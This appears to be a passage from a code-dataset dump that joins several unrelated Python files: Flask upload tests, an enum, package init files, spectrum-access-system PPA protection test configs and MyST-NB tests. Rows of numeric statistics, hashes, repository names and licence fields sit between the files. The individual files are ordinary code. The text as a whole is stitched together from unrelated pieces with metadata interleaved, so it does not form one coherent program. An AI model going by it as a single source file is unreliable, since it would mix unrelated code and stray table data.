post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data,
headers={'Accept': 'application/json'},
)
assert_that(
response.json['payload'],
equal_to(['message_1', 'message_2'])
)
assert_that(response.status_code, equal_to(400))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.validate')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_redirect_to_error_if_problems_and_prevent_post(
self,
data_set_post_patch,
validate_patch,
get_data_set_patch,
client):
validate_patch.return_value = ["99"]
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data)
assert_that(
self.get_from_session('upload_data')['payload'],
equal_to(['99']))
assert_that(response.headers['Location'], ends_with('/upload-data'))
assert_that(response.status_code, equal_to(302))
assert_that(data_set_post_patch.called, equal_to(False))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.validate')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_redirect_to_error_if_problems_and_prevent_post_json(
self,
data_set_post_patch,
validate_patch,
get_data_set_patch,
client):
validate_patch.return_value = ["99"]
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data,
headers={'Accept': 'application/json'},
)
assert_that(response.status_code, equal_to(400))
assert_that(data_set_post_patch.called, equal_to(False))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
def test_data_sets_redirects_to_sign_out_when_401_on_data_set_list(
self,
mock_data_set_list,
client):
bad_response = requests.Response()
bad_response.status_code = 401
http_error = requests.exceptions.HTTPError()
http_error.response = bad_response
mock_data_set_list.side_effect = http_error
response = client.get("/upload-data")
assert_that(response.status_code, equal_to(302))
assert_that(
response.headers['Location'],
ends_with('/sign-out'))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
def test_data_sets_renders_error_page_when_500_on_data_set_list(
self,
mock_data_set_list,
client):
http_error = requests.exceptions.HTTPError()
bad_response = Mock()
bad_response.status_code = 500
bad_response.content = '{"message": "Test Error"}'
http_error.response = bad_response
mock_data_set_list.side_effect = http_error
response = client.get("/upload-data")
self.assert_template_used('error.html')
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.list_data_sets')
def test_data_sets_renders_a_data_set_list_and_okay_message_on_success(
self,
mock_data_set_list,
client):
mock_data_set_list.return_value = [
{
'data_group': "group_1",
'data_type': "type1"
},
{
'data_group': "group_1",
'data_type': "type2"
},
{
'data_group': "group_2",
'data_type': "type3"
}
]
with self.client.session_transaction() as session:
session['upload_data'] = {
'data_group': 'group_1',
'data_type': 'type1',
'payload': ['Your data uploaded successfully'],
}
response = client.get("/upload-data")
assert_that(
response.data,
contains_string("type1"))
assert_that(
response.data,
contains_string("type2"))
assert_that(
response.data,
contains_string("type3"))
assert_that(
response.data,
contains_string(
"Your data uploaded successfully"))
def backdrop_response(status_code, return_value):
bad_response = requests.Response()
bad_response.status_code = status_code
bad_response.json = Mock(return_value=return_value)
http_error = requests.HTTPError()
http_error.response = bad_response
return http_error
| 34.820856 | 78 | 0.598556 | 1,394 | 13,023 | 5.237446 | 0.108321 | 0.056568 | 0.036981 | 0.051363 | 0.838926 | 0.823586 | 0.787837 | 0.771127 | 0.741542 | 0.741542 | 0 | 0.025167 | 0.289104 | 13,023 | 373 | 79 | 34.914209 | 0.763448 | 0 | 0 | 0.684685 | 0 | 0 | 0.259925 | 0.151117 | 0 | 0 | 0 | 0 | 0.09009 | 1 | 0.042042 | false | 0 | 0.015015 | 0 | 0.063063 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
82ab5dee3826ab67ea24709d2d2069fd3a6571c8 | 297 | py | Python | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | 1 | 2022-03-29T01:44:27.000Z | 2022-03-29T01:44:27.000Z | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | null | null | null | numerical_tic_tac_toe/game_mode.py | gbroques/numerical-tic-tac-toe | 143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class GameMode(Enum):
HUMAN_VS_COMPUTER = auto()
COMPUTER_VS_COMPUTER = auto()
def is_human_vs_computer(self):
return self is GameMode.HUMAN_VS_COMPUTER
def is_computer_vs_computer(self):
return self is GameMode.COMPUTER_VS_COMPUTER
| 22.846154 | 52 | 0.734007 | 42 | 297 | 4.857143 | 0.309524 | 0.294118 | 0.220588 | 0.196078 | 0.333333 | 0.333333 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.205387 | 297 | 12 | 53 | 24.75 | 0.864407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
82c15fcc29aeec0d0dd65aeebe69c59d3838271d | 277 | py | Python | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | interfax/__init__.py | ricky-shake-n-bake-bobby/interfax-python | 63c282672b6555f745d971988441af44b133468d | [
"MIT"
] | null | null | null | from .response import InboundFax, OutboundFax, ForwardingEmail, Document, Image
from .files import File
__version__ = '1.0.5'
from .client import InterFAX # NOQA
__all__ = ('InterFAX', 'InboundFax', 'OutboundFax', 'ForwardingEmail',
'Document', 'Image', 'File')
| 27.7 | 79 | 0.707581 | 29 | 277 | 6.482759 | 0.62069 | 0.223404 | 0.382979 | 0.468085 | 0.521277 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012931 | 0.162455 | 277 | 9 | 80 | 30.777778 | 0.797414 | 0.01444 | 0 | 0 | 0 | 0 | 0.243542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
82c684222bffe1ea811b0f167f955039fcb46e1a | 16,369 | py | Python | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | src/harness/testcases/WINNF_FT_S_PPR_testcase.py | nirajankeybridge/Spectrum-Access-System | e4e157f3b8fc9f29cb6fbb283acc3a7cbb1212e1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sas
import sas_testcase
from sas_test_harness import SasTestHarnessServer, generateCbsdRecords, \
generatePpaRecords
from util import winnforum_testcase, configurable_testcase, writeConfig, \
loadConfig, getRandomLatLongInPolygon, makePpaAndPalRecordsConsistent, \
getFqdnLocalhost, getUnusedPort, getCertFilename
from testcases.WINNF_FT_S_MCP_testcase import McpXprCommonTestcase
class PpaProtectionTestcase(McpXprCommonTestcase):
def setUp(self):
self._sas, self._sas_admin = sas.GetTestingSas()
self._sas_admin.Reset()
def tearDown(self):
self.ShutdownServers()
def generate_PPR_1_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.1. """
# Load PPA record
ppa_record = json.load(
open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
pal_record = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_0.json')))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json.load(
open(os.path.join('testcases', 'testdata', 'device_d.json')))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests
grant_request_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_1.json')))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_3 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_2.json')))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_4 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': []
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')
}]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_1_default_config)
def test_WINNF_FT_S_PPR_1(self, config_filename):
"""Single SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR1')
def generate_PPR_2_default_config(self, filename):
""" Generates the WinnForum configuration for PPR.2. """
# Load PPA record
ppa_record = json.load(
open(os.path.join('testcases', 'testdata', 'ppa_record_0.json')))
pal_record = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_0.json')))
pal_low_frequency = 3550000000
pal_high_frequency = 3560000000
ppa_record_1, pal_records_1 = makePpaAndPalRecordsConsistent(
ppa_record,
[pal_record],
pal_low_frequency,
pal_high_frequency,
'test_user_1'
)
# Load devices info
device_1 = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
# Moving device_1 to a location within 40 KMs of PPA zone
device_1['installationParam']['latitude'] = 38.8203
device_1['installationParam']['longitude'] = -97.2741
device_2 = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
# Moving device_2 to a location outside 40 KMs of PPA zone
device_2['installationParam']['latitude'] = 39.31476
device_2['installationParam']['longitude'] = -96.75139
device_3 = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Moving device_3 to a location within PPA zone
device_3['installationParam']['latitude'], \
device_3['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
device_4 = json.load(
open(os.path.join('testcases', 'testdata', 'device_d.json')))
# Moving device_4 to a location within PPA zone
device_4['installationParam']['latitude'], \
device_4['installationParam']['longitude'] = getRandomLatLongInPolygon(ppa_record_1)
# Load Grant requests with overlapping frequency range for all devices
grant_request_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_request_1['operationParam']['operationFrequencyRange']['lowFrequency'] = 3550000000
grant_request_1['operationParam']['operationFrequencyRange']['highFrequency'] = 3560000000
grant_request_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_1.json')))
grant_request_2['operationParam']['operationFrequencyRange']['lowFrequency'] = 3570000000
grant_request_2['operationParam']['operationFrequencyRange']['highFrequency'] = 3580000000
grant_request_3 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_2.json')))
grant_request_3['operationParam']['operationFrequencyRange']['lowFrequency'] = 3590000000
grant_request_3['operationParam']['operationFrequencyRange']['highFrequency'] = 3600000000
grant_request_4 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_request_4['operationParam']['operationFrequencyRange']['lowFrequency'] = 3610000000
grant_request_4['operationParam']['operationFrequencyRange']['highFrequency'] = 3620000000
# device_b and device_d are Category B
# Load Conditional Data
self.assertEqual(device_2['cbsdCategory'], 'B')
conditionals_device_2 = {
'cbsdCategory': device_2['cbsdCategory'],
'fccId': device_2['fccId'],
'cbsdSerialNumber': device_2['cbsdSerialNumber'],
'airInterface': device_2['airInterface'],
'installationParam': device_2['installationParam'],
'measCapability': device_2['measCapability']
}
self.assertEqual(device_4['cbsdCategory'], 'B')
conditionals_device_4 = {
'cbsdCategory': device_4['cbsdCategory'],
'fccId': device_4['fccId'],
'cbsdSerialNumber': device_4['cbsdSerialNumber'],
'airInterface': device_4['airInterface'],
'installationParam': device_4['installationParam'],
'measCapability': device_4['measCapability']
}
# Remove conditionals from registration
del device_2['cbsdCategory']
del device_2['airInterface']
del device_2['installationParam']
del device_2['measCapability']
del device_4['cbsdCategory']
del device_4['airInterface']
del device_4['installationParam']
del device_4['measCapability']
# Registration and grant records
cbsd_records_domain_proxy_0 = {
'registrationRequests': [device_1, device_2],
'grantRequests': [grant_request_1, grant_request_2],
'conditionalRegistrationData': [conditionals_device_2]
}
cbsd_records_domain_proxy_1 = {
'registrationRequests': [device_3],
'grantRequests': [grant_request_3],
'conditionalRegistrationData': []
}
# Protected entity record
protected_entities = {
'palRecords': pal_records_1,
'ppaRecords': [ppa_record_1]
}
# SAS Test Harnesses configurations,
# Following configurations are for two SAS test harnesses
sas_test_harness_device_1 = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
sas_test_harness_device_1['fccId'] = "test_fcc_id_e"
sas_test_harness_device_1['userId'] = "test_user_id_e"
sas_test_harness_device_2 = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
sas_test_harness_device_2['fccId'] = "test_fcc_id_f"
sas_test_harness_device_2['userId'] = "test_user_id_f"
sas_test_harness_device_3 = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
sas_test_harness_device_3['fccId'] = "test_fcc_id_g"
sas_test_harness_device_3['userId'] = "test_user_id_g"
# Generate Cbsd FAD Records for SAS Test Harness 0
cbsd_fad_records_sas_test_harness_0 = generateCbsdRecords(
[sas_test_harness_device_1],
[[grant_request_1]]
)
# Generate Cbsd FAD Records for SAS Test Harness 1
cbsd_fad_records_sas_test_harness_1 = generateCbsdRecords(
[sas_test_harness_device_2, sas_test_harness_device_3],
[[grant_request_2], [grant_request_3]]
)
# Generate SAS Test Harnesses dump records
dump_records_sas_test_harness_0 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_0
}
dump_records_sas_test_harness_1 = {
'cbsdRecords': cbsd_fad_records_sas_test_harness_1
}
# SAS Test Harnesses configuration
sas_test_harness_0_config = {
'sasTestHarnessName': 'SAS-TH-1',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas.cert'),
'serverKey': getCertFilename('sas.key'),
'caCert': getCertFilename('ca.cert')
}
sas_test_harness_1_config = {
'sasTestHarnessName': 'SAS-TH-2',
'hostName': getFqdnLocalhost(),
'port': getUnusedPort(),
'serverCert': getCertFilename('sas_1.cert'),
'serverKey': getCertFilename('sas_1.key'),
'caCert': getCertFilename('ca.cert')
}
iteration_config = {
'cbsdRequestsWithDomainProxies': [cbsd_records_domain_proxy_0,
cbsd_records_domain_proxy_1],
'cbsdRecords': [{
'registrationRequest': device_4,
'grantRequest': grant_request_4,
'conditionalRegistrationData': conditionals_device_4,
'clientCert': getCertFilename('device_d.cert'),
'clientKey': getCertFilename('device_d.key')
}],
'protectedEntities': protected_entities,
'dpaActivationList': [],
'dpaDeactivationList': [],
'sasTestHarnessData': [dump_records_sas_test_harness_0,
dump_records_sas_test_harness_1]
}
# Create the actual config.
config = {
'initialCbsdRequestsWithDomainProxies': self.getEmptyCbsdRequestsWithDomainProxies(2),
'initialCbsdRecords': [],
'iterationData': [iteration_config],
'sasTestHarnessConfigs': [sas_test_harness_0_config,
sas_test_harness_1_config],
'domainProxyConfigs': [{
'cert': getCertFilename('domain_proxy.cert'),
'key': getCertFilename('domain_proxy.key')
}, {
'cert': getCertFilename('domain_proxy_1.cert'),
'key': getCertFilename('domain_proxy_1.key')}
]
}
writeConfig(filename, config)
@configurable_testcase(generate_PPR_2_default_config)
def test_WINNF_FT_S_PPR_2(self, config_filename):
"""Multiple SAS PPA Protection
"""
config = loadConfig(config_filename)
# Invoke MCP test steps 1 through 22.
self.executeMcpTestSteps(config, 'xPR2')
| 40.517327 | 97 | 0.667664 | 1,683 | 16,369 | 6.206774 | 0.144385 | 0.026805 | 0.036186 | 0.030825 | 0.85449 | 0.818974 | 0.767471 | 0.743155 | 0.729753 | 0.729753 | 0 | 0.037493 | 0.216262 | 16,369 | 403 | 98 | 40.617866 | 0.776756 | 0.124076 | 0 | 0.681208 | 0 | 0 | 0.294645 | 0.049201 | 0 | 0 | 0 | 0 | 0.013423 | 1 | 0.020134 | false | 0 | 0.02349 | 0 | 0.04698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
82d8970ccb0024465e233c44969887e186280d4a | 147 | py | Python | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 180 | 2019-07-12T07:45:26.000Z | 2022-03-22T13:16:57.000Z | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 2,466 | 2016-12-24T01:03:52.000Z | 2019-07-04T13:41:08.000Z | docs/source/topics/processes/include/snippets/functions/signature_plain_python_args_kwargs.py | azadoks/aiida-core | b806b7fef8fc79090deccfe2019b77cb922e0581 | [
"MIT",
"BSD-3-Clause"
] | 88 | 2016-12-23T16:28:00.000Z | 2019-07-01T15:55:20.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def add(*args, **kwargs):
return sum(args) + sum(kwargs.values())
add(4, 5, z=6) # Returns 15
| 18.375 | 43 | 0.578231 | 24 | 147 | 3.541667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 147 | 7 | 44 | 21 | 0.658333 | 0.360544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7d7ed0ff97e0b51c25246f940ee70da0ae032d30 | 171 | py | Python | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 2 | 2020-09-22T09:59:56.000Z | 2022-01-31T20:00:49.000Z | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 1 | 2021-07-20T20:01:46.000Z | 2021-07-20T21:21:03.000Z | libs/cidre/cidre/__init__.py | YuzhongHuangCS/journal-citation-cartels | 7b82d9e081555f5b40eb6cc6f44f65ce1c3c1a0f | [
"BSD-2-Clause"
] | 3 | 2021-03-09T04:38:56.000Z | 2021-07-13T04:49:15.000Z | """
CIDRE algorithm
"""
from cidre import utils
from cidre import filters
from cidre import draw
from cidre import cidre
__all__ = ["utils", "filters", "draw", "cidre"]
| 17.1 | 47 | 0.719298 | 23 | 171 | 5.173913 | 0.347826 | 0.302521 | 0.504202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163743 | 171 | 9 | 48 | 19 | 0.832168 | 0.087719 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7dc203b51f80ac344c66e327ed3aed01a2af2b96 | 2,469 | py | Python | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mystnb_features.py | krassowski/MyST-NB | f44aa273af91a16a06be3ccc4612d9bcd2390135 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from sphinx.util.fileutil import copy_asset_file
@pytest.mark.sphinx_params(
"mystnb_codecell_file.md",
conf={"jupyter_execute_notebooks": "cache", "source_suffix": {".md": "myst-nb"}},
)
def test_codecell_file(sphinx_run, file_regression, check_nbs, get_test_path):
asset_path = get_test_path("mystnb_codecell_file.py")
copy_asset_file(str(asset_path), str(sphinx_run.app.srcdir))
sphinx_run.build()
assert sphinx_run.warnings() == ""
assert set(sphinx_run.app.env.metadata["mystnb_codecell_file"].keys()) == {
"jupytext",
"kernelspec",
"author",
"source_map",
"language_info",
}
assert sphinx_run.app.env.metadata["mystnb_codecell_file"]["author"] == "Matt"
assert (
sphinx_run.app.env.metadata["mystnb_codecell_file"]["kernelspec"]
== '{"display_name": "Python 3", "language": "python", "name": "python3"}'
)
file_regression.check(
sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb", encoding="utf8"
)
file_regression.check(
sphinx_run.get_doctree().pformat(), extension=".xml", encoding="utf8"
)
@pytest.mark.sphinx_params(
"mystnb_codecell_file_warnings.md",
conf={"jupyter_execute_notebooks": "force", "source_suffix": {".md": "myst-nb"}},
)
def test_codecell_file_warnings(sphinx_run, file_regression, check_nbs, get_test_path):
asset_path = get_test_path("mystnb_codecell_file.py")
copy_asset_file(str(asset_path), str(sphinx_run.app.srcdir))
sphinx_run.build()
assert (
"mystnb_codecell_file_warnings.md:14 content of code-cell "
"is being overwritten by :load: mystnb_codecell_file.py"
in sphinx_run.warnings()
)
assert set(sphinx_run.app.env.metadata["mystnb_codecell_file_warnings"].keys()) == {
"jupytext",
"kernelspec",
"author",
"source_map",
"language_info",
}
assert (
sphinx_run.app.env.metadata["mystnb_codecell_file_warnings"]["author"]
== "Aakash"
)
assert (
sphinx_run.app.env.metadata["mystnb_codecell_file_warnings"]["kernelspec"]
== '{"display_name": "Python 3", "language": "python", "name": "python3"}'
)
file_regression.check(
sphinx_run.get_nb(), check_fn=check_nbs, extension=".ipynb", encoding="utf8"
)
file_regression.check(
sphinx_run.get_doctree().pformat(), extension=".xml", encoding="utf8"
)
| 35.782609 | 88 | 0.665047 | 299 | 2,469 | 5.157191 | 0.250836 | 0.105058 | 0.140078 | 0.058366 | 0.897536 | 0.836576 | 0.836576 | 0.784695 | 0.784695 | 0.698444 | 0 | 0.00497 | 0.185095 | 2,469 | 68 | 89 | 36.308824 | 0.761431 | 0 | 0 | 0.507937 | 0 | 0 | 0.313892 | 0.119887 | 0 | 0 | 0 | 0 | 0.126984 | 1 | 0.031746 | false | 0 | 0.031746 | 0 | 0.063492 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7dd0e46b460596b7de8262dd9a01863594e30ebb | 108 | py | Python | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 1 | 2019-11-30T22:54:18.000Z | 2019-11-30T22:54:18.000Z | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 275 | 2019-09-17T14:52:39.000Z | 2022-03-31T16:20:41.000Z | tabletoolz/__init__.py | KapilKhanal/tabletoolz | 154397dec976a35b199dfdf9c45d248cff592498 | [
"MIT"
] | 2 | 2020-01-10T06:39:19.000Z | 2020-06-05T22:36:44.000Z | #from .base import *
from .databases import *
from .pyspark import *
from .sql import *
from .data import *
